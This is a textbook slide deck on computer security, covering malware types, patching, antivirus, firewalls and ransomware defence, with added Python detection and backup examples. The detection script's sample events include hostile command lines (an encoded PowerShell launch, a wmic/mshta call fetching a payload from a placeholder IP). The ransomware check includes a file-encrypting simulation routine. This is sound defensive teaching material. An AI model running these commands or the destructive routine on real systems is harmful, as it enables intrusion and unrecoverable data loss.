Ciampa SecurityAwareness6e PPT Module03


Security Awareness, 6e
Module 3: Computer Security

Mark Ciampa, Security Awareness, 6th Edition. © 2024 Cengage. All Rights Reserved. May not be scanned, copied or duplicated, or posted
to a publicly accessible website, in whole or in part. 1
Icebreaker
Would you rather this or that…

Module Objectives
3.1: Define malware
3.2: Identify the different types of malware attacks
3.3: Explain how managing patches and running antimalware software can
provide a defense
3.4: Explain what a firewall does
3.5: Describe how to stop ransomware

Introduction
• Protecting personal computers is challenging
• Many different types of attacks exist today
– Attackers are constantly modifying attacks and creating new ones
– “Zero-day attacks” exploit previously unknown vulnerabilities, giving defenders
zero days of advance warning
• No single defensive program exists
– Several different defenses must be in place
• In this module, you will learn about computer security

Malware Attacks (1 of 2)
• Malware (malicious software)
– Software that enters a computer system without the owner’s knowledge or
consent
– Performs unwanted and usually harmful action
– The number of instances of malware is staggering
– Malware continues to evolve to avoid detection and successfully attack
computers

Malware Attacks (2 of 2)
• One method of classifying the various types of malware is by the primary
action the malware performs:
– Kidnap
– Eavesdrop
– Masquerade
– Serve as a launchpad
– Sidestep

Kidnap
Kidnapping is a crime that involves capturing a person and then holding
them captive until a ransom is paid for their release.

Ransomware is malicious software that “kidnaps” a user’s computer and
holds it “hostage” until a ransom is paid.

There are two types of ransomware:
• Blocker ransomware
• Cryptomalware

Blocker Ransomware (1 of 5)
• Earliest form of ransomware
• When reaching a system, the ransomware infects the computer and
manipulates its operating system
• It blocks all normal access to the device
• Rebooting over and over has no impact
• Typically, a message on the user’s screen appears pretending to be
from a reputable third party, such as a law enforcement agency
– Usually provides a “valid” reason for blocking user access

Blocker Ransomware (2 of 5)

Blocker Ransomware (3 of 5)
• Another variation pretends to come from a reputable software vendor
with various fictitious warnings
– The software has expired
– The computer has a problem such as imminent hard drive failure
– The computer has a malware infection
• Users are told that they must immediately renew their license online

Blocker Ransomware (4 of 5)

Blocker Ransomware (5 of 5)
• Attackers today often drop the pretense and simply block the user’s
computer and demand a fee
• For individuals, the ransom is usually around $500
• For enterprises, the ransom can be tens or hundreds of millions of
dollars
• The top four ransomware targets are education, retail, business and
professional services, and government

Cryptomalware (1 of 3)
• A recent and more malicious form of ransomware
• Encrypts some or all of the files on the device so they cannot be opened
• Encrypting only some files helps the malware to evade detection
• A message contains a fee that must be paid to receive a key
– Often there is an urgency in that the fee increases every few hours or days
– If the ransom is not paid by a certain deadline, the key can never be
purchased

Cryptomalware (2 of 3)

Cryptomalware (3 of 3)
• Today, a decryption tool is delivered 99% of the time after the ransom is
paid
– The key only works about 96% of the time because some variants corrupt the
data during encryption, so paying does not guarantee recovery
• New variants encrypt all files on any network or device connected to that
computer, including cloud-based data repositories

Eavesdrop
A category of malware that eavesdrops or secretly listens to its victims.

Two common types are:
• Keyloggers
• Spyware

Keylogger (1 of 4)
• A software program or a small hardware device that silently captures
and stores each keystroke a user types on the computer’s keyboard
• Captures passwords, credit card numbers, or personal information
• Software keyloggers are programs either installed locally on the computer or
installed remotely
– Hides itself from detection by the user
– Can make screen captures
– Can silently turn on the computer’s web camera to record images of the
user

Keylogger (2 of 4)

Keylogger (3 of 4)
• Hardware keylogger
– Hardware devices installed between the keyboard cable and the computer’s USB port
– Often used on computers in public places such as libraries and computer
labs
– Resembles an ordinary keyboard connection
– Beyond the reach of antimalware scanning software
– Threat actor must install and then return to physically remove the device in
order to access the information

Keylogger (4 of 4)

Spyware (1 of 2)
• Tracking software that is deployed without the consent or control of the
user.
• Uses the computer’s resources, including programs already installed on
the computer
• Collects and distributes personal or sensitive information
• There are spyware monitoring tools that can help parents keep track of
the online activities of their children

Spyware (2 of 2)
Table 3-1 Technologies used by spyware

Automatic download software
  Description: Used to download and install software without the user’s interaction
  Impact: Could install unauthorized applications

Passive tracking technologies
  Description: Used to gather information about user activities without installing any software
  Impact: Could collect private information such as websites a user has visited

System modifying software
  Description: Modifies or changes user configurations, such as the web browser home page or search page, default media player, or lower-level system functions
  Impact: Changes configurations to settings that the user did not approve

Tracking software
  Description: Used to monitor user behavior or gather information about the user, sometimes including personally identifiable or other sensitive information
  Impact: Could collect personal information that can be shared widely or stolen, resulting in fraud or identity theft

Masquerade
• Malware that attempts to deceive the user and hide its true identity by
“masquerading” or pretending to be something else
• Three types of masquerading malware:
– Potentially unwanted programs (PUPs)
– Trojans
– Remote access Trojans (RATs)

Potentially Unwanted Program (PUP) (1 of 3)
• A broad category of software that is usually more annoying than
malicious
– Software the user does not want on their computer
– Often installed along with other programs as a result of overlooking the
default installation options
– May include software that is preinstalled on a new computer or smartphone
(called “bloatware”) and cannot easily be removed
– Many PUPs display advertising through pop-up windows that obstruct
content

Potentially Unwanted Program (PUP) (2 of 3)

Potentially Unwanted Program (PUP) (3 of 3)

Trojan
• An executable program that masquerades as performing a benign
activity but also does something malicious
• Similar concept to the large, hollow, wooden horse used by the Greeks
to win the Trojan War
• User downloads a useful program like a calendar, yet this installation
also installs malware that
– Scans the system for personal information
– Connects through the network to a remote system
– Transmits that information to the attacker

Remote Access Trojan (RAT)
• A special type of Trojan that also gives the threat agent unauthorized
remote access to the victim’s computer
• Uses specially configured communication protocols that allow the threat
agent unrestricted access
• Attacker can change computer settings, browse and copy files, and use
the computer to access other computers connected to the network

Launchpad (1 of 2)
• A launchpad is an area on which a rocket stands and serves as a means
to catapult the rocket into space
• In a similar fashion, this category of malware infects a computer and
uses the infected computer as a launchpad to send attacks to other
computers
• The types of launchpad malware include:
– Virus
– Worm
– Bot

Launchpad (2 of 2)

Virus (1 of 5)
Two types of viruses: file-based virus and fileless virus

• File-based virus
– Remarkably similar to a biological virus
– Malicious computer code attached to a file
– When the program or data file is launched, the virus
▪ unloads a payload to perform a malicious action
▪ reproduces itself by inserting its code into another file on the same computer

Virus (2 of 5)
• A file-based virus can only replicate on the host computer
– Cannot spread between computers without user action
– Must rely on the actions of users to spread to other computers
– Spread by a user transferring infected files to other devices
– The virus must have two carriers:
▪ a file to which it attaches
▪ a human to transport it to other computers

Virus (3 of 5)
Table 3-2 Windows file types that can be infected

File extension Description


.docx or .xlsx Microsoft Office user documents
.exe Executable program file
.msi Microsoft installer file
.msp Windows installer patch file
.scr Windows screen saver
.cpl Windows Control Panel file
.msc Microsoft Management Console file
.wsf Windows script file
.ps1 Windows PowerShell script

Virus (4 of 5)
• Fileless virus
– Does not attach itself to a file
– Takes advantage of native services and processes that are part of the
operating system
– These trusted, preinstalled programs are called living-off-the-land binaries
(LOLBins)
▪ Examples: executables, libraries, and scripts (.EXE, .DLL, and .VBS files)
that already exist on the system
– The malicious code is loaded directly into the computer’s random access
memory (RAM) through the LOLBins and then executed, leaving little on disk for
file-based scanning to find

Virus (5 of 5)
LOLBins commonly used by fileless viruses

PowerShell: A cross-platform and open-source task automation and configuration
management framework

Windows Management Instrumentation (WMI): A Microsoft standard for accessing
management information about devices

.NET Framework: A free, cross-platform, open-source developer platform for building
different types of applications

Macro: A series of instructions that can be grouped together as a single command
to automate a complex set of tasks or a repeated series of tasks. Macros are
written in a macro scripting language, such as Visual Basic for Applications
(VBA), and are stored within the user document. Note that the default Word .docx
and Excel .xlsx formats cannot store macros; a document must be saved in a
macro-enabled format (.docm or .xlsm) or the legacy binary format (.doc or .xls)
for a macro to be present and run.
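Because a fileless virus leaves little on disk, defenders look at how the LOLBins above are invoked rather than at files. The following is an added example, not from the Ciampa text, of detection logic a practitioner might run over process-creation telemetry. It is Python; the six log lines are constructed (hypothetical parent/image/command-line triples, not real telemetry), the rule names are illustrative, and the 198.51.100.7 address is a documentation-range placeholder.

```python
import re

# Constructed sample process-creation events (hypothetical, not from any real incident).
# Format: "parent_image|image|command_line"
SAMPLE_EVENTS = [
    "explorer.exe|notepad.exe|notepad.exe C:\\Users\\ann\\notes.txt",
    "WINWORD.EXE|powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "cmd.exe|wmic.exe|wmic process call create \"mshta http://198.51.100.7/x.hta\"",
    "services.exe|svchost.exe|svchost.exe -k netsvcs",
    "EXCEL.EXE|rundll32.exe|rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\";alert(1)",
    "explorer.exe|powershell.exe|powershell.exe Get-ChildItem C:\\Temp",
]

# Office applications should almost never spawn a script host or LOLBin directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe", "wmic.exe"}

# Command-line patterns typical of fileless, in-memory execution through LOLBins.
RULES = [
    ("encoded_powershell",
     re.compile(r"(?i)\bpowershell(\.exe)?\b.*\s-(e|ec|en|enc|encodedcommand)\s")),
    ("hidden_window",
     re.compile(r"(?i)-w(indowstyle)?\s+hidden\b")),
    ("wmic_process_create",
     re.compile(r"(?i)\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b")),
    ("lolbin_remote_or_script_payload",
     re.compile(r"(?i)\b(mshta|regsvr32|rundll32)(\.exe)?\b.*(https?://|javascript:|scrobj\.dll)")),
]


def parse_event(line):
    """Split one constructed log line into (parent, image, command_line)."""
    parent, image, cmd = line.split("|", 2)
    return parent.lower(), image.lower(), cmd


def classify_event(line):
    """Return the sorted list of rule names that fire for one event ([] = benign)."""
    parent, image, cmd = parse_event(line)
    hits = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    for name, pattern in RULES:
        if pattern.search(cmd):
            hits.append(name)
    return sorted(hits)


def scan(events):
    """Map event index -> rule hits for every event that tripped at least one rule."""
    return {i: hits for i, line in enumerate(events) if (hits := classify_event(line))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}  <- {SAMPLE_EVENTS[idx]}")
```

Note that the plain `Get-ChildItem` invocation is not flagged: PowerShell itself is legitimate, and the rules key on the encoding, hidden-window, and Office-parent context that distinguish abuse from administration. Real environments still need tuning, since some management tools legitimately use encoded commands.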

Worm (1 of 3)
• Worms (sometimes called network viruses)
– Malicious program that uses a computer network to replicate
– Enters a computer through the network
– Takes advantage of a vulnerability in a program or an operating system
– Searches for another computer with same vulnerability
– Sends copies of itself over the network

Worm (2 of 3)
• One of the first wide-scale worms occurred in 1988, affecting about 10% of the
devices connected to the Internet at that time
• Early worms were designed to spread quickly but not corrupt the
systems
– They slowed down the network due to replicating so quickly
• Today’s worms can leave behind a payload and cause harm
– Deleting files on the computer
– Allowing the computer to be remotely controlled by an attacker

Worm (3 of 3)
Virus vs. Worm

• Similarity
– Both are automatically self-replicating
• Difference
– Where they replicate
▪ A virus self-replicates on the host computer
▪ A worm self-replicates between computers

Bot (1 of 3)
• Popular payload of malware that allows the infected computer to be
placed under the remote control of an attacker to launch attacks
– The infected ‘‘robot’’ computer is known as a bot or zombie
– Botnet
▪ Hundreds, thousands, or millions of bot computers gathered in a logical
computer network
– Bot herder (attacker) controls the botnet

Bot (2 of 3)
Table 3-4 Uses of botnets

Spamming: Botnets are widely recognized as the primary source of spam email. A
botnet consisting of thousands of bots enables an attacker to send massive
amounts of spam.

Spreading malware: Botnets can be used to spread malware and create new bots and
botnets. Bots can download and execute a file sent by the attacker.

Ad fraud: Threat actors earn money by generating a high number of “clicks” on
advertisements at targeted websites, using a bot to mimic the selections of a user.

Mining cryptocurrencies: Also called “cryptomining,” this is a process in which
transactions for various forms of cryptocurrency are verified, earning the “miner”
a monetary reward. Botnets combine the resources of millions of bots for mining
cryptocurrencies.

Bot (3 of 3)
Bot herders can instruct bots by a Command & Control structure (C&C)
• Bots can automatically sign in to a website owned by the bot herder
• Bots can sign in to a third-party website
• Bots can receive instructions via blogs, posts on Twitter, or notes posted
on Facebook
• Bot herders can use a “dead drop” C&C mechanism
– Creates a Google Gmail email account and drafts an unsent email
– Bots log in to the email account and read the draft
– The draft is never sent so there is no record of it

Sidestep
• Malware designed to help other malware “sidestep” or evade detection
– Backdoor
– Logic bomb
– Rootkit

Backdoor
A backdoor is software code that gives access to a computer, program, or
service by circumventing its normal security protections.
– Allows the attacker to return at a later time and bypass security settings
– Developers often create a legitimate backdoor that allows them to access a
program or device during development without needing passwords or security approvals
– If not removed when the application is finalized, attackers can use it to
bypass security

Logic Bomb
A logic bomb is computer code that is added to a legitimate program but
lies dormant and evades detection until triggered by a specific logical event
– Once triggered, the program deletes data or performs other malicious
activities
– Embedded in very large computer programs, so they are difficult to detect
– A trusted employee can easily insert a few lines of computer code without
anyone detecting it
– Most often a logic bomb is based on a specific time or date, such as 90
days after an employee was terminated from the job

Rootkits
A rootkit is malware that can hide its own presence and the presence of other
malware on the computer.
– Access “lower layers” of the operating system or use undocumented
functions to make alterations
– Can be undetectable by the operating system and common antimalware
scanning software
– The risks are lower today due to protections built into operating systems

Knowledge Check Activity 3-1
Which two statements are correct?

1. The two types of viruses are a file-based virus and a fileless virus.
2. A keylogger can be a software program or a small hardware device.
3. When hundreds, thousands, or even millions of bot computers are
gathered into a logical computer network, they create a “swarm.”

Knowledge Check Activity 3-1: Answer
Which two statements are correct?

The two types of viruses are a file-based virus and a fileless virus.

A keylogger can be a software program or a small hardware device.

Computer Defenses
• No single defense can be implemented to protect a computer
• Defenses a user should implement
– Managing patches
– Running antimalware software
– Examining firewalls
– Stopping ransomware

Managing Patches (1 of 3)
• Due to the increased complexity of operating systems, unintentional
vulnerabilities were introduced that could be exploited by attackers
• To address the vulnerabilities and to provide ongoing additional features,
operating system vendors deploy updates to users’ computers through
an automatic online update service
• A software update that addresses a security issue is known as a patch
• Promptly installing patches once they are available is the most important
step to protecting your computer

Managing Patches (2 of 3)
Table 3-5 Microsoft operating system updates

Feature updates
  Release cycle: Annually
  Description: These updates add new features to the operating system.

Quality updates
  Release cycle: Second Tuesday of each month (“Patch Tuesday”), although they
  can be released at any time
  Description: Quality updates deliver both security and non-security fixes and
  include security updates, critical updates, servicing stack updates, and
  driver updates.

Insider previews
  Release cycle: No fixed schedule
  Description: These “builds” are made available to interested users during the
  development process of new features that will be shipped in the next feature
  update.

Managing Patches (3 of 3)

Running Antimalware Software
Antimalware software is software that can combat various malware attacks.

The most common types are:
• antivirus (AV) software
• comprehensive antimalware software

Antivirus (AV) Software
• Antivirus software
– Scans a computer for infections
– Monitors computer activity
– Examines new documents that might contain a virus
– Works by matching to known virus “signatures”
– The AV vendor must constantly update the signature file
– Due to the many types of malware, AV software is no longer considered a
“magic bullet” for providing complete protection on a computer
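To see why an exact signature match is no longer enough, here is an added example that is not from the Ciampa text. It is Python; the “samples” are constructed byte strings standing in for program files (no real malware), and the signature names Ransom.Demo.A and Ransom.Demo.gen are invented for the illustration. A hash signature catches the file it was written for, a one-byte repack evades it, and a family-level byte pattern still catches the repack.

```python
import hashlib
import re

# Constructed stand-ins for binaries (harmless bytes, not real malware).
KNOWN_SAMPLE = b"MZ\x90\x00...payload: DROP_RANSOM_NOTE;ENCRYPT(*.docx)..."
# The "same" program after a trivial repack: one byte in the header changed.
VARIANT_SAMPLE = KNOWN_SAMPLE.replace(b"\x90", b"\x91", 1)
BENIGN_SAMPLE = b"MZ\x90\x00...Hello, world; saves your document..."

# What a classic AV signature file holds: exact identities of known files.
HASH_SIGNATURES = {
    hashlib.sha256(KNOWN_SAMPLE).hexdigest(): "Ransom.Demo.A",
}

# Generic (family) signatures: a byte pattern shared by every variant.
PATTERN_SIGNATURES = [
    ("Ransom.Demo.gen", re.compile(rb"DROP_RANSOM_NOTE;ENCRYPT\(\*\.\w+\)")),
]


def hash_scan(data):
    """Exact-match detection: returns the signature name or None."""
    return HASH_SIGNATURES.get(hashlib.sha256(data).hexdigest())


def pattern_scan(data):
    """Family-level detection: first byte pattern that appears in the file."""
    for name, pattern in PATTERN_SIGNATURES:
        if pattern.search(data):
            return name
    return None


def scan(data):
    """Return (verdict, engine): try the exact hash first, then the pattern."""
    hit = hash_scan(data)
    if hit:
        return hit, "hash"
    hit = pattern_scan(data)
    if hit:
        return hit, "pattern"
    return None, None


if __name__ == "__main__":
    for label, sample in [("known", KNOWN_SAMPLE), ("variant", VARIANT_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(label, scan(sample))
```

The variant is exactly why vendors must ship signature updates constantly and why AV products added generic patterns, heuristics, and the behavioral monitoring described on the next slides: attackers can regenerate a new hash far faster than a vendor can publish one.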

Comprehensive Antimalware Software (1 of 2)
Comprehensive antimalware software looks for viruses and also provides:
• Intrusion prevention: analyzes information arriving from a network and
blocks potential threats before they enter the computer
• Reputation protection: classifies software application files as
“dangerous,” “risky,” or “safe” based on their attributes
• Behavioral protection: monitors applications for suspicious behavior and
automatically blocks the software if necessary

Both Microsoft Windows and Apple macOS have built-in comprehensive
antimalware software.
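Behavioral protection is what catches the cryptomalware described earlier in this module even when no signature exists: mass encryption changes what the files on disk look like. The following added example (not from the Ciampa text) shows two behavioral checks in Python: a planted canary file that should never change, and a Shannon-entropy test that flags files whose contents have become random-looking. The directory, the “report” files, and the cryptomalware stand-in (which XORs each file with a throwaway random keystream and renames it) are all constructed inside a temporary folder for the demonstration; the 7.2 bits/byte threshold and the canary filename are assumptions, not values from the book.

```python
import math
import os
import tempfile
from collections import Counter
from pathlib import Path

ENTROPY_THRESHOLD = 7.2      # bits per byte; English text is ~4-5, encrypted data ~7.9 (assumed cut-off)
CANARY_NAME = "000_do_not_touch.txt"
CANARY_BODY = b"canary " * 200


def shannon_entropy(data):
    """Bits of entropy per byte of data (0.0 for empty input, 8.0 for perfectly uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def plant_canary(root):
    """Write a file that legitimate users never touch; any change means trouble."""
    canary = root / CANARY_NAME
    canary.write_bytes(CANARY_BODY)
    return canary


def assess_directory(root, min_size=256):
    """Behavioral verdict for a folder: canary intact and fraction of high-entropy files."""
    files = [p for p in root.iterdir() if p.is_file()]
    high = 0
    for p in files:
        data = p.read_bytes()
        if len(data) >= min_size and shannon_entropy(data) > ENTROPY_THRESHOLD:
            high += 1
    canary = root / CANARY_NAME
    canary_ok = canary.exists() and canary.read_bytes() == CANARY_BODY
    suspicious = (not canary_ok) or (len(files) > 0 and high / len(files) > 0.5)
    return {"files": len(files), "high_entropy": high,
            "canary_intact": canary_ok, "suspicious": suspicious}


def simulate_cryptomalware(root):
    """Test fixture only: XOR every file with a discarded random keystream and rename it .locked."""
    for p in list(root.iterdir()):
        if p.is_file():
            data = p.read_bytes()
            key = os.urandom(len(data))          # never stored, so the data is unrecoverable
            p.with_name(p.name + ".locked").write_bytes(bytes(a ^ b for a, b in zip(data, key)))
            p.unlink()


def demo():
    """Assess a constructed Documents folder before and after the simulated attack."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for i in range(8):
            (root / f"report_{i}.txt").write_text(f"Quarterly figures, line {i}\n" * 40)
        plant_canary(root)
        before = assess_directory(root)
        simulate_cryptomalware(root)
        after = assess_directory(root)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after: ", after)
```

A real product would run these checks continuously and kill the offending process after the first few files, not after the whole folder. Entropy alone also misfires on legitimately compressed or encrypted files (ZIP archives, JPEGs, password-protected PDFs), which is why the canary and the rate of change matter as much as the raw score.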

Comprehensive Antimalware Software (2 of 2)

Examining Firewalls (1 of 3)
A computer firewall (a packet filter) is designed to limit the spread of
malware. There are two types of firewalls.

• Software-based personal firewall
– All modern operating systems include an application firewall
– Designed to prevent malware from entering a computer
– Examines incoming data from the Internet or local network
– The user can create an “opening” in the firewall just for an approved program to
communicate across the local network or with an Internet server

Examining Firewalls (2 of 3)

Examining Firewalls (3 of 3)
• Hardware-based network firewall
– Designed to protect an entire network
– Usually located at the “edge” of the network as the first line of defense
Table 3-6 Personal and network firewalls

Location
  Personal firewall: Runs on a single computer
  Network firewall: Located on the edge of the network

Scope of protection
  Personal firewall: Protects only the computer on which it is installed
  Network firewall: Protects all devices connected to the network

Type
  Personal firewall: Software that runs on the computer
  Network firewall: Part of a Wi-Fi modem/router or a separate hardware device

Filtering
  Personal firewall: Based on programs running on the computer
  Network firewall: Provides a sophisticated range of filtering mechanisms

Stopping Ransomware (1 of 2)
The defenses against ransomware include unplugging devices and creating
data backups.

• Unplug devices
– If a remote storage device is “mounted” on the local computer and can be
freely accessed or displays a drive letter (like “D:”), then those files are at
risk: cryptomalware encrypts whatever the logged-in user account can write to
– If a cloud storage repository is configured so that files are automatically
synced to the cloud storage, then those files are at risk

Stopping Ransomware (2 of 2)
• The solution is to “air gap” or physically isolate the computer from the
storage device
– External USB storage device—unplug it when not being used
– Secondary hard disk drive—“unmount” it when it is not needed
– Network-attached storage (NAS)—create a new share (“admin”) with a
strong username and password and log in and out as needed
– Cloud storage—consider turning off automatic synchronization and choose
to log into cloud storage via a web browser that requires a username and
password

Creating Data Backups (1 of 4)
• Copy data from computer’s hard drive onto other digital media
– Store backup in a secure location
• Backups can restore computer to properly functioning state
• Can also protect against:
– Hardware malfunctions
– User error
– Software corruption
– Natural disasters

Creating Data Backups (2 of 4)
• Continuous Cloud Backups
– Performed continually without intervention by the user
– Software monitors what files have changed and automatically updates the
backed-up files with the most recent versions
– These backups are stored online

Creating Data Backups (3 of 4)
• Cloud-based services are available
– Automated continuous backup
– Universal access
– Optional program file backup
– Delayed deletion
– Online or hardware-based restore
• Advantage of online continuous backups:
– They are performed automatically and stored at a remote location

Creating Data Backups (4 of 4)
• Scheduled Local Backups—performed intentionally by the user and
stored locally
• Backup strategy
– What data should be backed up?—little need to back up programs
– What media should be used?—consider a portable USB hard drive
– Where to store the backup?—stored offsite
– How frequently should the backup be performed?—once per day if the
computer is used frequently, otherwise twice per week
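A backup only stops ransomware if it can actually be restored, so a backup strategy should include verification. The following added example, which is not from the Ciampa text, implements a scheduled local backup in Python: it copies a folder to a destination standing in for a portable USB drive, records a SHA-256 hash of every file in a manifest, and later re-checks the copy to detect missing or altered files. The Documents folder, its two files, and the simulated damage are all constructed inside a temporary directory; the manifest filename MANIFEST.json is an assumption for the illustration.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path

MANIFEST_NAME = "MANIFEST.json"   # assumed name for the hash list stored with the backup


def sha256_file(path):
    """Stream a file through SHA-256 so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def create_backup(source, dest):
    """Copy every file under source into dest and write a manifest of file hashes."""
    manifest = {}
    for p in sorted(source.rglob("*")):
        if p.is_file():
            rel = p.relative_to(source).as_posix()
            target = dest / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(p, target)           # copy2 keeps timestamps as well as content
            manifest[rel] = sha256_file(p)    # hash the ORIGINAL, so a bad copy is caught too
    (dest / MANIFEST_NAME).write_text(json.dumps(manifest, indent=2, sort_keys=True))
    return manifest


def verify_backup(dest):
    """Recompute hashes inside the backup; return {relative_path: problem} (empty = healthy)."""
    manifest = json.loads((dest / MANIFEST_NAME).read_text())
    problems = {}
    for rel, expected in manifest.items():
        target = dest / rel
        if not target.exists():
            problems[rel] = "missing"
        elif sha256_file(target) != expected:
            problems[rel] = "hash mismatch"
    return problems


def demo():
    """Back up a constructed Documents folder, verify it, damage it, verify again."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / "Documents"
        dst = Path(tmp) / "usb_backup"      # stands in for a portable USB hard drive
        (src / "taxes").mkdir(parents=True)
        (src / "taxes" / "2023.txt").write_text("income 1\n")
        (src / "letter.txt").write_text("Dear Sam,\n")
        manifest = create_backup(src, dst)
        clean = verify_backup(dst)
        # Simulate media corruption of one file and loss of another on the backup drive.
        (dst / "letter.txt").write_text("Dear XXX,\n")
        (dst / "taxes" / "2023.txt").unlink()
        damaged = verify_backup(dst)
    return len(manifest), clean, damaged


if __name__ == "__main__":
    count, clean, damaged = demo()
    print(f"{count} files backed up; problems after verification: {clean}")
    print(f"problems after simulated damage: {damaged}")
```

Run the verification from the backup media itself, then unplug the drive as the previous slides advise; a backup that stays mounted is just another drive letter for cryptomalware to encrypt.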

Knowledge Check Activity 3-2
Which two statements are correct?

1. Installing AV is the most important step to protecting your computer.
2. It is recommended that users have both a personal firewall and some
type of hardware firewall.
3. The most comprehensive backup solution for most users is a
continuous cloud backup.

Knowledge Check Activity 3-2: Answer
Which two statements are correct?

It is recommended that users have both a personal firewall and some
type of hardware firewall.

The most comprehensive backup solution for most users is a
continuous cloud backup.

Summary

